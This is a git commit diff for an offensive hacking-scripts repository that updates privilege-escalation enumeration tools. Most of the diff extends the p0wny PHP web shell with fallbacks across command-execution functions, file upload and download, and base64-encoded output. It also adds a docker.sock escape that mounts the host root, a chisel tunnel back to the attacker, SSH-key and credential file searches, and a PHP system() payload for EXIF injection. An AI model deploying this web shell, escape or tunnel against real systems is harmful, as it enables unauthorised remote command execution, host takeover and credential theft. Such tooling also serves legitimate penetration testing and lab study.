Update Dependencies + paramiko port forwarding + some bug fixes

This commit is contained in:
Roman Hergenreder 2023-09-13 21:16:52 +02:00
parent 9e6432d976
commit b1380967a4
19 changed files with 1735 additions and 1409 deletions

@ -2,6 +2,12 @@
This repository contains self-made and common scripts for information gathering, enumeration and more.
### Installation
```bash
git clone git@romanh.de:Roman/HackingScripts
sudo ln -s HackingScripts $(python -c "import sys;print(sys.path[-1])")/hackingscripts
```
### Enumeration: Initial Scans
- first_scan.sh: Performs initial nmap scan
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt

BIN
chisel

Binary file not shown.

BIN
chisel64

Binary file not shown.

@ -129,7 +129,7 @@ TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override\|cap_sys_rawio\|cap_mknod"
CONTAINER_CMDS="docker lxc rkt kubectl podman"
USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
@ -561,7 +561,13 @@ containerCapabilities() {
printNo
fi
else
printError "Unknown (capsh not installed)"
caps=$(grep Cap /proc/self/status)
capEff=$(grep CapEff /proc/self/status | cut -d ':' -f 2 | tr -d '\t')
printError "capsh not installed, listing raw capabilities"
printInstallAdvice "libcap2-bin"
printStatus "Current capabilities are:"
printStatus "$caps"
printStatus "> This can be decoded with: \"capsh --decode=${capEff}\""
fi
}
@ -1046,9 +1052,18 @@ exploitDockerSock() {
nl
# Try to find an available docker image
json_data=$(curl -s --unix-socket /var/run/docker.sock http://localhost/images/json)
docker_img=$(echo "$json_data" | grep -o '"RepoTags":\["[^"]*' | grep -o '[^"]*$' | tail -1)
if [ -z "$docker_img" ]; then
printInfo 'No avaliable docker image found, using alpine'
docker_img="alpine"
fi
# Create docker container using the docker sock
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"$docker_img\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
if ! [ $? ]; then
printError 'Something went wrong'

@ -137,7 +137,6 @@ class HttpFileServer(HTTPServer):
self.prefix_routes = { }
self.is_running = True
self.listen_thread = None
self.has_exited = False
def cleanPath(self, path):
@ -231,9 +230,6 @@ class HttpFileServer(HTTPServer):
self.listen_thread.start()
return self.listen_thread
def start(self):
return self.serve_forever()
def get_base_url():
addr, port = self.server_address
if port != 80:
@ -244,27 +240,10 @@ class HttpFileServer(HTTPServer):
def stop(self):
self.is_running = False
time.sleep(1)
try:
# dummy request
for i in range(3):
requests.get(f"{self.get_base_url()}/dummy")
if self.has_exited:
break
time.sleep(1)
except:
pass
self.shutdown()
if self.listen_thread != threading.currentThread():
self.listen_thread.join()
def serve_forever(self):
self.has_exited = False
while self.is_running:
self.handle_request()
self.has_exited = True
if __name__ == "__main__":
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])

2692
linpeas.sh

File diff suppressed because one or more lines are too long

@ -1,7 +1,7 @@
#!/bin/bash
#
# Copyright (c) 2016-2022, @_mzet_
# Copyright (c) 2016-2023, https://github.com/mzet-
#
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it

9
lse.sh

@ -5,7 +5,7 @@
# Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
#
lse_version="4.10nw"
lse_version="4.13nw"
##( Colors
#
@ -611,6 +611,7 @@ lse_get_distro_codename() { #(
elif [ -f /etc/os-release ]; then
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
echo "$distro" | grep -qi opensuse && distro=opsuse
echo "$distro" | grep -qi rhel && distro=redhat
elif [ -f /etc/redhat-release ]; then
grep -qi "centos" /etc/redhat-release && distro=centos
grep -qi "fedora" /etc/redhat-release && distro=fedora
@ -635,7 +636,7 @@ lse_get_pkg_version() { #(
pkg_name="$1"
case "$lse_distro_codename" in
debian|ubuntu)
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3`
;;
centos|redhat|fedora|opsuse|rocky|amzn)
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
@ -845,7 +846,7 @@ lse_run_tests_filesystem() {
#looking for credentials in /etc/fstab and /etc/mtab
lse_test "fst120" "0" \
"Are there any credentials in fstab/mtab?" \
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab'
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab'
#check if current user has mail
lse_test "fst130" "1" \
@ -910,7 +911,7 @@ lse_run_tests_filesystem() {
#check for SSH files anywhere
lse_test "fst510" "2" \
"SSH files anywhere" \
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
#dump hosts.equiv file
lse_test "fst520" "2" \

@ -1,5 +1,10 @@
<?php
$SHELL_CONFIG = array(
'username' => 'p0wny',
'hostname' => 'shell',
);
function expandPath($path) {
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
exec("echo $match[1]", $stdout);
@ -8,8 +13,52 @@ function expandPath($path) {
return $path;
}
function allFunctionExist($list = array()) {
foreach ($list as $entry) {
if (!function_exists($entry)) {
return false;
}
}
return true;
}
function executeCommand($cmd) {
$output = '';
if (function_exists('exec')) {
exec($cmd, $output);
$output = implode("\n", $output);
} else if (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
ob_start();
system($cmd);
$output = ob_get_contents();
ob_end_clean();
} else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
ob_start();
passthru($cmd);
$output = ob_get_contents();
ob_end_clean();
} else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
$handle = popen($cmd, 'r');
while (!feof($handle)) {
$output .= fread($handle, 4096);
}
pclose($handle);
} else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
$handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
$output = stream_get_contents($pipes[1]);
proc_close($handle);
}
return $output;
}
function isRunningWindows() {
return stripos(PHP_OS, "WIN") === 0;
}
function featureShell($cmd, $cwd) {
$stdout = array();
$stdout = "";
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
chdir(expandPath("~"));
@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) {
return featureDownload($match[1]);
} else {
chdir($cwd);
exec($cmd, $stdout);
$stdout = executeCommand($cmd);
}
return array(
"stdout" => $stdout,
"cwd" => getcwd()
"stdout" => base64_encode($stdout),
"cwd" => base64_encode(getcwd())
);
}
function featurePwd() {
return array("cwd" => getcwd());
return array("cwd" => base64_encode(getcwd()));
}
function featureHint($fileName, $cwd, $type) {
@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) {
}
$cmd = "/bin/bash -c \"$cmd\"";
$files = explode("\n", shell_exec($cmd));
foreach ($files as &$filename) {
$filename = base64_encode($filename);
}
return array(
'files' => $files,
);
@ -54,12 +106,12 @@ function featureDownload($filePath) {
$file = @file_get_contents($filePath);
if ($file === FALSE) {
return array(
'stdout' => array('File not found / no read permission.'),
'cwd' => getcwd()
'stdout' => base64_encode('File not found / no read permission.'),
'cwd' => base64_encode(getcwd())
);
} else {
return array(
'name' => basename($filePath),
'name' => base64_encode(basename($filePath)),
'file' => base64_encode($file)
);
}
@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) {
$f = @fopen($path, 'wb');
if ($f === FALSE) {
return array(
'stdout' => array('Invalid path / no write permission.'),
'cwd' => getcwd()
'stdout' => base64_encode('Invalid path / no write permission.'),
'cwd' => base64_encode(getcwd())
);
} else {
fwrite($f, base64_decode($file));
fclose($f);
return array(
'stdout' => array('Done.'),
'cwd' => getcwd()
'stdout' => base64_encode('Done.'),
'cwd' => base64_encode(getcwd())
);
}
}
function initShellConfig() {
global $SHELL_CONFIG;
if (isRunningWindows()) {
$username = getenv('USERNAME');
if ($username !== false) {
$SHELL_CONFIG['username'] = $username;
}
} else {
$pwuid = posix_getpwuid(posix_geteuid());
if ($pwuid !== false) {
$SHELL_CONFIG['username'] = $pwuid['name'];
}
}
$hostname = gethostname();
if ($hostname !== false) {
$SHELL_CONFIG['hostname'] = $hostname;
}
}
if (isset($_GET["feature"])) {
$response = NULL;
@ -108,6 +181,8 @@ if (isset($_GET["feature"])) {
header("Content-Type: application/json");
echo json_encode($response);
die();
} else {
initShellConfig();
}
?><!DOCTYPE html>
@ -125,6 +200,9 @@ if (isset($_GET["feature"])) {
background: #333;
color: #eee;
font-family: monospace;
width: 100vw;
height: 100vh;
overflow: hidden;
}
*::-webkit-scrollbar-track {
@ -145,17 +223,21 @@ if (isset($_GET["feature"])) {
#shell {
background: #222;
max-width: 800px;
margin: 50px auto 0 auto;
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
font-size: 10pt;
display: flex;
flex-direction: column;
align-items: stretch;
max-width: calc(100vw - 2 * var(--shell-margin));
max-height: calc(100vh - 2 * var(--shell-margin));
resize: both;
overflow: hidden;
width: 100%;
height: 100%;
margin: var(--shell-margin) auto;
}
#shell-content {
height: 500px;
overflow: auto;
padding: 5px;
white-space: pre-wrap;
@ -168,20 +250,27 @@ if (isset($_GET["feature"])) {
text-align: center;
}
@media (max-width: 991px) {
:root {
--shell-margin: 25px;
}
@media (min-width: 1200px) {
:root {
--shell-margin: 50px !important;
}
}
@media (max-width: 991px),
(max-height: 600px) {
#shell-logo {
font-size: 6px;
margin: -25px 0;
}
html, body, #shell {
height: 100%;
width: 100%;
max-width: none;
:root {
--shell-margin: 0 !important;
}
#shell {
margin-top: 0;
resize: none;
}
}
@ -210,6 +299,7 @@ if (isset($_GET["feature"])) {
display: flex;
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
border-top: rgba(255, 255, 255, .05) solid 1px;
padding: 10px 0;
}
#shell-input > label {
@ -230,6 +320,7 @@ if (isset($_GET["feature"])) {
font-size: 10pt;
width: 100%;
align-self: center;
box-sizing: border-box;
}
#shell-input div {
@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {
</style>
<script>
var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
var CWD = null;
var commandHistory = [];
var historyPosition = 0;
@ -277,10 +369,10 @@ if (isset($_GET["feature"])) {
} else {
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
if (response.hasOwnProperty('file')) {
featureDownload(response.name, response.file)
featureDownload(atob(response.name), response.file)
} else {
_insertStdout(response.stdout.join("\n"));
updateCwd(response.cwd);
_insertStdout(atob(response.stdout));
updateCwd(atob(response.cwd));
}
});
}
@ -291,7 +383,9 @@ if (isset($_GET["feature"])) {
function _requestCallback(data) {
if (data.files.length <= 1) return; // no completion
data.files = data.files.map(function(file){
return atob(file);
});
if (data.files.length === 2) {
if (type === 'cmd') {
eShellCmdInput.value = data.files[0];
@ -341,8 +435,8 @@ if (isset($_GET["feature"])) {
var promise = getBase64(element.files[0]);
promise.then(function (file) {
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
_insertStdout(response.stdout.join("\n"));
updateCwd(response.cwd);
_insertStdout(atob(response.stdout));
updateCwd(atob(response.cwd));
});
}, function () {
_insertStdout('An unknown client-side error occurred.');
@ -368,7 +462,7 @@ if (isset($_GET["feature"])) {
var splittedCwd = cwd.split("/");
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
}
return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
}
function updateCwd(cwd) {
@ -378,7 +472,7 @@ if (isset($_GET["feature"])) {
return;
}
makeRequest("?feature=pwd", {}, function(response) {
CWD = response.cwd;
CWD = atob(response.cwd);
_updatePrompt();
});

BIN
pspy

Binary file not shown.

BIN
pspy64

Binary file not shown.

@ -11,6 +11,13 @@ import threading
import paramiko
import readline
import base64
import select
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
class ShellListener:
@ -162,6 +169,97 @@ class ShellListener:
if permissions:
self.sendline(f"chmod {permissions} {path}")
class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
class ParamikoTunnel:
def __init__(self, shell, ports):
self.shell = shell
self.ports = ports
self.verbose = False
self.is_running = True
self.on_message = []
self.listen_threads = []
self.servers = []
def start_background(self):
for port in self.ports:
thread = threading.Thread(target=self.start, args=(port, ))
thread.start()
self.listen_threads.append(thread)
return self.listen_threads
def start(self, port):
this = self
class SubHandler(ParamikoTunnelHandler):
peer = this.shell.get_transport().sock.getpeername()
chain_host = "127.0.0.1"
chain_port = port
ssh_transport = this.shell.get_transport()
def log(self, message):
if this.verbose:
print(message)
forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
self.servers.append(forward_server)
forward_server.serve_forever()
def close(self):
self.is_running = False
for server in self.servers:
server._BaseServer__shutdown_request = True
for thread in self.listen_threads:
thread.join()
class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
chan = self.ssh_transport.open_channel(
"direct-tcpip",
(self.chain_host, self.chain_port),
self.request.getpeername(),
)
except Exception as e:
self.log(
"Incoming request to %s:%d failed: %s"
% (self.chain_host, self.chain_port, repr(e))
)
return
if chan is None:
self.log(
"Incoming request to %s:%d was rejected by the SSH server."
% (self.chain_host, self.chain_port)
)
return
self.log(
"Connected! Tunnel open %r -> %r -> %r"
% (
self.request.getpeername(),
chan.getpeername(),
(self.chain_host, self.chain_port),
)
)
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
peername = self.request.getpeername()
chan.close()
self.request.close()
self.log("Tunnel closed from %r" % (peername,))
def generate_payload(type, local_address, port, index=None):
commands = []
@ -238,7 +336,13 @@ def create_tunnel(shell, ports: list):
t.start()
shell.sendline(f"/tmp/chisel64 client --max-retry-count 1 {ipAddress}:{chiselPort} {ports} 2>&1 >/dev/null &")
return t
elif isinstance(shell, paramiko.SSHClient):
paramiko_tunnel = ParamikoTunnel(shell, ports)
paramiko_tunnel.start_background()
return paramiko_tunnel
# TODO: https://github.com/paramiko/paramiko/blob/88f35a537428e430f7f26eee8026715e357b55d6/demos/forward.py#L103
pass

0
uptux.py Normal file → Executable file

45
util.py

@ -1,7 +1,9 @@
#!/usr/bin/env python
import random
import math
import socket
import itertools
import netifaces as ni
import string
import sys
@ -44,15 +46,20 @@ def exit_with_error(res, err):
exit()
def assert_status_code(res, status_code, err=None):
if res.status_code != status_code:
if type(status_code) == int and res.status_code != status_code:
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
exit_with_error(res, err)
elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(status_code)}" if err is None else err
exit_with_error(res, err)
def assert_header_present(res, header, err=None):
if header in res.headers:
def assert_location(res, location, err=None):
assert_header_present(res, "Location")
location_header = res.headers["Location"].lower()
if location_header == location.lower():
return
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
err = f"[-] '{res.url}' returned unexpected location {location_header}, expected: {location}" if err is None else err
exit_with_error(res, err)
def assert_content_type(res, content_type, err=None):
@ -66,6 +73,13 @@ def assert_content_type(res, content_type, err=None):
err = f"[-] '{res.url}' returned unexpected content type {content_type_header}, expected: {content_type}" if err is None else err
exit_with_error(res, err)
def assert_header_present(res, header, err=None):
if header in res.headers:
return
err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
exit_with_error(res, err)
def openServer(address, ports=None):
listenPort = None
retry = True
@ -149,6 +163,29 @@ def pad(x, n):
x += (n-(len(x)%n))*b"\x00"
return x
def xor(a, b):
if len(a) == 0 or len(b) == 0:
return a
if len(a) < len(b):
a *= int(math.ceil((len(b)/len(a))))
a = a[0:len(b)]
elif len(b) < len(a):
b *= int(math.ceil((len(a)/len(b))))
b = b[0:len(a)]
if type(a) == str and type(b) == str:
return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(a, b) ])
else:
if type(a) != bytes:
a = a.encode()
if type(b) != bytes:
b = b.encode()
return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
import exif

Binary file not shown.

Binary file not shown.

@ -10,6 +10,14 @@ REM Registry scan of other drives besides
REM /////true or false
SET long=false
REM Check if the current path contains spaces
SET "CurrentFolder=%~dp0"
IF "!CurrentFolder!" NEQ "!CurrentFolder: =!" (
ECHO winPEAS.bat cannot run if the current path contains spaces.
ECHO Exiting.
EXIT /B 1
)
:Splash
ECHO.
CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m"
@ -52,7 +60,7 @@ CALL :ColorLine " %E%41mUse it at your own networks and/or with the network ow
ECHO.
:SystemInfo
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO"
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
@ -404,7 +412,7 @@ CALL :T_Progress 1
:CurrentClipboard
CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD"
ECHO. [i] Any password inside the clipboard?
ECHO. [i] Any passwords inside the clipboard?
powershell -command "Get-Clipboard" 2>nul
ECHO.
CALL :T_Progress 1
@ -565,7 +573,7 @@ CALL :T_Progress 2
:AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO.
CALL :T_Progress 2

Binary file not shown.

Binary file not shown.